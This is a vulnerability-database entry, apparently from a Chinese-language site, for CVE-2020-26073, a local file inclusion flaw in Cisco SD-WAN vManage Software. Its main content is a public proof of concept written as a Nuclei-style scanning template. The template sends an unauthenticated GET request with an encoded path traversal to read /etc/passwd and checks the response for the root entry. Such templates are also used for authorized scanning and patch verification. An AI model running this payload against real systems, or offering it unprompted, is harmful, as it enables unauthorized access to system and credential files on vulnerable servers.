CVE-2020-26073: Cisco SD-WAN vManage Software - Local File Inclusion

日期: 2025-08-01 | 影响软件: Cisco SD-WAN vManage Software | POC: 已公开

漏洞描述

Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.

PoC代码[已公开]

id: CVE-2020-26073

info:
  name: Cisco SD-WAN vManage Software - Local File Inclusion
  author: madrobot
  severity: high
  description: |
    Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the affected system.
  remediation: |
    Apply the latest security patches provided by Cisco to fix the vulnerability.
  reference:
    - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
  classification:
    cve-id: CVE-2020-26073
    epss-score: 0.89723
    epss-percentile: 0.99541
  metadata:
    max-request: 1
  tags: cve,cve2020,cisco,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 490a004630440220797acc46b86df0870477433d0ff332b555d999315d0aede6f4fbb0281794961c02207d43fd9fafd8264329ac43dad22cd302eeb181afa19f68174f22f9cbe9bf16d8:922c64590222798bb761d5b6d8e72950